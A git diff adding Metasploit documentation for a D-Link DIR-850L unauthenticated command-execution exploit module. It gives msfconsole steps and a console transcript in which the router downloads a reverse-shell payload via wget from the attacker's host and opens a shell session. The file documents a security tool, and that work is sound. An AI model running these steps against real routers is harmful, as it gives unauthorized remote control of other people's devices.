Create dlink_dir850l_unauth_exec.md

documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md

@@ -0,0 +1,40 @@
+The module dlink_dir850_(un)auth_exec leverages an unauthenticated credential disclosure vulneralbility to then execute arbitrary commands via an authenticated OS command injection
+vulneralbility. D-LINK 850L (excluding "Cloud" models) devices with firmware version up to 1.14B07
+are potentially vulnerable. The vulneralbility seems to occur within the parsing of the config. Another PoC can be found here https://www.seebug.org/vuldb/ssvid-96333. Setting command to be `reboot` will force the router into an infinite loop.
+
+## Vulnerable Application
+
+
+  1. Start msfconsole
+  2. Do : `use exploit/linux/http/dlink_dir850l_unauth_exec.rb`
+  3. Do : `set RHOST [RouterIP]`
+  4. Do : `set PAYLOAD linux/mipsle/shell/reverse_tcp`
+  5. Do : `run`
+  6. If router is vulnerable, payload should be dropped via wget and executed, and therein should obtain an session
+
+
+## Example
+
+```
+msf > use exploit/linux/http/dlink_850l_unauth_exec
+msf exploit(dlink_850l_unauthenticated_exec) > set RHOST 192.168.0.14
+RHOST => 192.168.0.14
+msf exploit(dlink_850l_unauthenticated_exec) > set RPORT 80
+RPORT => 80
+msf exploit(dlink_850l_unauthenticated_exec) > set LHOST ens3
+LHOST => ens3
+msf exploit(dlink_850l_unauthenticated_exec) > set LPORT 1351
+LPORT => 1351
+msf exploit(dlink_850l_unauthenticated_exec) > run
+
+[*] Started reverse TCP handler on 192.168.0.11:1351
+[*] 192.168.0.14:80 - Initiating exploitation...
+[*] Using URL: http://0.0.0.0:80/Muw2WNUEmsAlcdl
+[*] Local IP: http://192.168.0.11:80/Muw2WNUEmsAlcdl
+[*] 192.168.0.14:80 - Retrieving uid and auth challenge...
+[*] Command Stager progress - 100.00% done (101/101 bytes)
+[*] Client 192.168.0.14 (Wget) requested /Muw2WNUEmsAlcdl
+[*] Sending payload to 192.168.0.14 (Wget)
+[*] Command shell session 2 opened (192.168.0.11:1351 -> 192.168.0.14:55167) at 2017-11-02 15:37:06 -0400
+[*] Server stopped.
+```